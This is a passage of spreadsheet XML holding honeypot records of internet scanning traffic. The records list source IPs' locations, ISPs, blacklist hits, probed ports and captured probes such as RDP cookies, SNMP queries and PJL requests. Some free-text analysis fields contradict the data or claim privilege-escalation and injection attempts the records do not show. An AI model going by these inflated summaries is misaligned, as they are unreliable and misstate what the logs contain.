    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:c6a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="404"/>
    <x v="404"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:10:19"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T17:10:19"/>
    <n v="1394"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_DNS_H7&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;48509&amp;&amp;38399&amp;&amp;39841&amp;&amp;80&amp;&amp;46765&amp;&amp;50370&amp;&amp;44561&amp;&amp;33639&amp;&amp;23&amp;&amp;34707&amp;&amp;46436&amp;&amp;50272&amp;&amp;58201&amp;&amp;55725&amp;&amp;53&amp;&amp;30005&amp;&amp;57835&amp;&amp;53948&amp;&amp;52735&amp;&amp;40994&amp;&amp;48060&amp;&amp;56835&amp;&amp;58166&amp;&amp;39161&amp;&amp;53231&amp;&amp;45203&amp;&amp;53961&amp;&amp;42055&amp;&amp;33327&amp;&amp;39851&amp;&amp;42781&amp;&amp;44014&amp;&amp;52160&amp;&amp;60441&amp;&amp;39019&amp;&amp;56897&amp;&amp;57493&amp;&amp;54553&amp;&amp;40348&amp;&amp;33868&amp;&amp;54104&amp;&amp;59830&amp;&amp;38870&amp;&amp;34225&amp;&amp;38643&amp;&amp;58317&amp;&amp;39351&amp;&amp;40930&amp;&amp;35803&amp;&amp;54219&amp;&amp;56997&amp;&amp;54494&amp;&amp;58475&amp;&amp;49016&amp;&amp;59038&amp;&amp;49670&amp;&amp;53246&amp;&amp;52181&amp;&amp;55969&amp;&amp;43493&amp;&amp;47719&amp;&amp;60048&amp;&amp;51672&amp;&amp;52613&amp;&amp;41922&amp;&amp;36248&amp;&amp;32815&amp;&amp;33627&amp;&amp;38231&amp;&amp;56726&amp;&amp;56826&amp;&amp;34846&amp;&amp;60370&amp;&amp;51794&amp;&amp;51600&amp;&amp;46562&amp;&amp;39008&amp;&amp;51492&amp;&amp;51742&amp;&amp;48188&amp;&amp;39956&amp;&amp;49471&amp;&amp;44040&amp;&amp;41906&amp;&amp;46306&amp;&amp;53250&amp;&amp;37458&amp;&amp;41838&amp;&amp;41377&amp;&amp;33147&amp;&amp;35968&amp;&amp;46442&amp;&amp;34495&amp;&amp;32850&amp;&amp;47176&amp;&amp;57206&amp;&amp;54831&amp;&amp;49069&amp;&amp;44361&amp;&amp;57681&amp;&amp;37218&amp;&amp;38411&amp;&amp;44619&amp;&amp;51424&amp;&amp;33678&amp;&amp;55112&amp;&amp;45582&amp;&amp;34585&amp;&amp;58172&amp;&amp;56898&amp;&amp;54188&amp;&amp;38385&amp;&amp;35688&amp;&amp;50801&amp;&amp;43133&amp;&amp;40151&amp;&amp;42232&amp;&amp;41644&amp;&amp;51400&amp;&amp;NA&amp;&amp;47069&amp;&amp;48093&amp;&amp;34863&amp;&amp;34012&amp;&amp;34020&amp;&amp;34028&amp;&amp;34032&amp;&amp;34036&amp;&amp;50232&amp;&amp;50248&amp;&amp;50252"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;GET&amp;&amp;POST&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:baf"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze activity. &amp;&amp; This log suggests that there was an attempt to initiate a TELNET connection, which could be a scanning or probing activity to identify open ports. This behavior is often indicative of reconnaissance efforts by malicious actors. The lack of any further activity may indicate the actor moved on to another target."/>
    <s v="There is no log data provided."/>
  </r>
  <r>
    <x v="405"/>
    <x v="405"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:09:21"/>
    <d v="2023-08-08T19:46:00"/>
    <d v="2025-04-29T17:09:21"/>
    <n v="517"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;16718&amp;&amp;1433&amp;&amp;57705&amp;&amp;45031&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="X"/>
    <s v="Cordoba"/>
    <s v="Departamento de Capital"/>
    <s v="Córdoba"/>
    <s v="3860259"/>
    <s v="NA"/>
    <s v="-31.4135"/>
    <s v="-64.1811"/>
    <s v="28026"/>
    <s v="Grape S.A."/>
    <s v="Grape S.A."/>
    <s v="business"/>
    <s v="Grape S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be6a:64a6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient data to provide an analysis of possible malicious activity. &amp;&amp; This log indicates that no malicious SQL injection attempt was made through this service as MSSQL is reported as Not Available (NA). The system monitored for potential SQL injection attacks did not record any suspicious activity. No actual attack was detected on the SQL service. &amp;&amp; No log data available to analyze."/>
    <s v="SQL Attack"/>
  </r>
  <r>
    <x v="406"/>
    <x v="406"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:46:43"/>
    <d v="2025-04-29T16:46:43"/>
    <d v="2025-04-29T16:46:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744b:e9b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="407"/>
    <x v="407"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:42:38"/>
    <d v="2025-03-26T15:02:58"/>
    <d v="2025-04-29T16:42:38"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="None"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d330:7a66"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="408"/>
    <x v="408"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:27:50"/>
    <d v="2025-04-29T16:27:50"/>
    <d v="2025-04-29T16:27:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="46"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="40"/>
    <s v="Calabarzon"/>
    <s v="Cavite"/>
    <s v="Tulay"/>
    <s v="1680855"/>
    <s v="NA"/>
    <s v="14.2697"/>
    <s v="120.769"/>
    <s v="132199"/>
    <s v="GLOBE-MOBILE-5TH-GEN-AS"/>
    <s v="Globe Telecom"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4bf:ffc0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="409"/>
    <x v="409"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:27:14"/>
    <d v="2023-11-30T01:23:49"/>
    <d v="2025-04-29T16:27:14"/>
    <n v="697"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_SIP_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;80&amp;&amp;NA&amp;&amp;143&amp;&amp;3306&amp;&amp;445&amp;&amp;6379&amp;&amp;23&amp;&amp;5432&amp;&amp;161&amp;&amp;110&amp;&amp;1433&amp;&amp;389&amp;&amp;1521&amp;&amp;19553&amp;&amp;6595&amp;&amp;3389&amp;&amp;1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;53851&amp;&amp;443&amp;&amp;54722&amp;&amp;51733&amp;&amp;6667&amp;&amp;52354&amp;&amp;62062&amp;&amp;54193&amp;&amp;53766&amp;&amp;53985&amp;&amp;57026"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57810)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57820)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57830)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xjGkhyWSt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SnEAvt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=afnmqd'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OuzApCZVi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eqAJuG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hURqUE'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fZQqzscVP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IQeRZT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aKWIeF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IcMLYpReN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jgIYup'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hZMClE'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62728)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62738)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62744)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OxuhAhSNc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mmTQQQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TgRJdF'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '0493851846@10.128.0.71', 'contact': 'sip:QVrVjHuS@10.128.0.71:51369', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:psthLnEz@10.128.0.71:51369;tag=50176750', 'max-forwards': '20', 'to': 'sip:LBCOfJyo@203.29.241.98', 'user-agent': 'CotPXoMf', 'via': 'SIP/2.0/UDP 10.128.0.71:51369;branch=xnwVgR.3177477512;received=205.210.31.71;rport;alias'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gETlEznxa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iKemqR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nOnkNq'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f47"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze, as the log data field is empty or contains &quot;NA&quot;. &amp;&amp; No activity detected for LDAP service. No malicious login attempts were made. The service was idle during this time period. &amp;&amp; This indicates an attempt to access or modify file permissions on a system, potentially indicating malicious intent to escalate privileges or gain unauthorized control. The actor is trying to alter system settings. Access attempts are being made. &amp;&amp; Possible attempt to exploit a service, attempting to gain unauthorized access, possibly trying to inject malicious code. Data was requested from an unknown source with no identification. Unknown entity is probing system for potential vulnerabilities. &amp;&amp; An unknown entity has attempted to connect to the PJL (Printer Job Language) 